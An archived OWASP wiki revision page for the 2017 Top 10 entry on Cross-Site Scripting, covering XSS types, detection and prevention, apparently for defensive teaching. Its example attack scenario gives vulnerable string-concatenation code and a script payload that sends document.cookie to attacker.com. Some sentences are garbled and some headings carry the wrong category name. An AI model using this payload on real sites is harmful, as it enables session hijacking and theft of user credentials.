This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Top 10-2017 A7-Cross-Site Scripting (XSS)"

From OWASP
Jump to: navigation, search
m (underlined all links, redefined links to OWASP as internal links (including a tabbed link), created a link at reference to 2017-A8)
Line 25: Line 25:
  
 
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
 
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
[[Cross-site_Scripting_(XSS) | XSS]] flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks Stored] and (2) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks Reflected], and each of these can occur on the a) [[Types_of_Cross-Site_Scripting#Server_XSS | Server ]] or b) on the [[Types_of_Cross-Site_Scripting#Client_XSS | Client]]. Detection of most [[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]] flaws is fairly easy via testing or code analysis. [[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]] is very difficult to identify.
+
<u>[[Cross-site_Scripting_(XSS) | XSS]]</u> flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) <u>[[Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks|Stored]]</u> and (2) <u>[[Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks|Reflected]]</u>, and each of these can occur on the a) <u>[[Types_of_Cross-Site_Scripting#Server_XSS | Server ]]</u> or b) on the <u>[[Types_of_Cross-Site_Scripting#Client_XSS | Client]]</u>. Detection of most <u>[[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]]</u> flaws is fairly easy via testing or code analysis. <u>[[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]]</u> is very difficult to identify.
 
</td>
 
</td>
 
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
 
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
Line 38: Line 38:
  
 
{{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2017|language=en}}
 
{{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2017|language=en}}
You are vulnerable to [[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]] if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have [[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]. Ideally, you would avoid sending attacker-controllable data to [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf unsafe JavaScript APIs], but escaping (and to a lesser extent) input validation can be used to make this safe.
+
You are vulnerable to <u>[[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]]</u> if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have <u>[[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]</u>. Ideally, you would avoid sending attacker-controllable data to <u>[[Media:Unraveling_some_Mysteries_around_DOM-based_XSS.pdf|unsafe JavaScript APIs]]</u>, but escaping (and to a lesser extent) input validation can be used to make this safe.
  
 
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
 
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
Preventing XSS requires separation of untrusted data from active browser content.
 
Preventing XSS requires separation of untrusted data from active browser content.
# To avoid [[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]], the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet|OWASP XSS Prevention Cheat Sheet]] for details on the required data escaping techniques.
+
# To avoid <u>[[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]]</u>, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the <u>[[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet|OWASP XSS Prevention Cheat Sheet]]</u> for details on the required data escaping techniques.
# To avoid [[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]], the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the [[DOM_based_XSS_Prevention_Cheat_Sheet|OWASP DOM based XSS Prevention Cheat Sheet]].
+
# To avoid <u>[[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]</u>, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the <u>[[DOM_based_XSS_Prevention_Cheat_Sheet|OWASP DOM based XSS Prevention Cheat Sheet]]</u>.
# For rich content, consider auto-sanitization libraries like OWASP’s [[AntiSamy]] or the [[OWASP Java HTML Sanitizer Project|Java HTML Sanitizer Project]].
+
# For rich content, consider auto-sanitization libraries like OWASP’s <u>[[AntiSamy]]</u> or the <u>[[OWASP Java HTML Sanitizer Project|Java HTML Sanitizer Project]]</u>.
# Consider [https://en.wikipedia.org/wiki/Content_Security_Policy Content Security Policy (CSP)] to defend against XSS across your entire site.
+
# Consider <u>[https://en.wikipedia.org/wiki/Content_Security_Policy Content Security Policy (CSP)]</u> to defend against XSS across your entire site.
  
  
Line 65: Line 65:
 
</span>{{Top_10_2010:ExampleEndTemplate}}
 
</span>{{Top_10_2010:ExampleEndTemplate}}
  
This attack causes the victim’s session ID to be sent to the the application might employ. See 2017-A8 for info on CSRF. attacker’s website, allowing the attacker to hijack the user’s current session.  
+
This attack causes the victim’s session ID to be sent to the the application might employ. See <u>[[{{Top_10:LanguageFile|text=documentRootTop10|language=en|year=2017 }}-A8-{{Top_10_2010:ByTheNumbers|8|year=2017|language=en}}|2017-A8]]</u> for info on CSRF. attacker’s website, allowing the attacker to hijack the user’s current session.  
  
 
Note that attackers can also use XSS to defeat any  automated CSRF defense  
 
Note that attackers can also use XSS to defeat any  automated CSRF defense  
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
* [[Types of Cross-Site Scripting]]
+
* <u>[[Types of Cross-Site Scripting]]</u>
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet
+
* <u>[[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet]]</u>
]]
+
* <u>[[DOM_based_XSS_Prevention_Cheat_Sheet | OWASP DOM based XSS Prevention Cheat Sheet]]</u>
* [[DOM_based_XSS_Prevention_Cheat_Sheet | OWASP DOM based XSS Prevention Cheat Sheet]]
+
* <u>[[OWASP_Java_Encoder_Project#Use_the_Java_Encoder_Project | OWASP Java Encoder API]]</u><!--- tab syntax for internal links including tabs: <link>#<tab-description> --->
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project OWASP Java Encoder API]
+
* <u>[[ASVS | ASVS: Output Encoding/Escaping Requirements (V6)]]</u>
* [[ASVS | ASVS: Output Encoding/Escaping Requirements (V6)]]
+
* <u>[[AntiSamy | OWASP AntiSamy: Sanitization Library]]</u>
* [[AntiSamy | OWASP AntiSamy: Sanitization Library]]
+
* <u>[[Testing_for_Data_Validation | Testing Guide: 1st 3 Chapters on Data Validation Testing]]</u>
* [[Testing_for_Data_Validation | Testing Guide: 1st 3 Chapters on Data Validation Testing]]
+
* <u>[[Reviewing_Code_for_Cross-site_scripting | OWASP Code Review Guide: Chapter on XSS Review]]</u>
* [[Reviewing_Code_for_Cross-site_scripting | OWASP Code Review Guide: Chapter on XSS Review]]
+
* <u>[[XSS_Filter_Evasion_Cheat_Sheet | OWASP XSS Filter Evasion Cheat Sheet]]</u>
* [[XSS_Filter_Evasion_Cheat_Sheet | OWASP XSS Filter Evasion Cheat Sheet]]
 
  
 
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
 
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
* [http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]
+
* <u>[http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]</u>
  
 
{{Top_10_2013:BottomAdvancedTemplate
 
{{Top_10_2013:BottomAdvancedTemplate

Revision as of 11:53, 23 April 2017

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →
Threat Agents / Attack Vectors Security Weakness Impacts
App Specific Exploitability
AVERAGE
Prevalence
VERY WIDESPREAD
Detectability
AVERAGE
Impact
MODERATE
Business ?

Consider anyone who can send untrusted data to the system, including external users, business partners, other systems, internal users, and administrators.

Attackers send text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

XSS flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) Stored and (2) Reflected, and each of these can occur on the a) Server or b) on the Client. Detection of most Server XSS flaws is fairly easy via testing or code analysis. Client XSS is very difficult to identify.

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Consider the business value of the affected system and all the data it processes.

Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable To 'Sensitive Data Exposure'?

You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.

Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.

How Do I Prevent 'Sensitive Data Exposure'?

Preventing XSS requires separation of untrusted data from active browser content.

  1. To avoid Server XSS, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  2. To avoid Client XSS, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the OWASP DOM based XSS Prevention Cheat Sheet.
  3. For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.
  4. Consider Content Security Policy (CSP) to defend against XSS across your entire site.


Example Attack Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in their browser to:

'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>'.

This attack causes the victim’s session ID to be sent to the the application might employ. See 2017-A8 for info on CSRF. attacker’s website, allowing the attacker to hijack the user’s current session.

Note that attackers can also use XSS to defeat any automated CSRF defense

References

OWASP

External

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →

© 2002-2017 OWASP Foundation This document is licensed under the Creative Commons Attribution-ShareAlike 3.0 license. Some rights reserved. CC-by-sa-3 0-88x31.png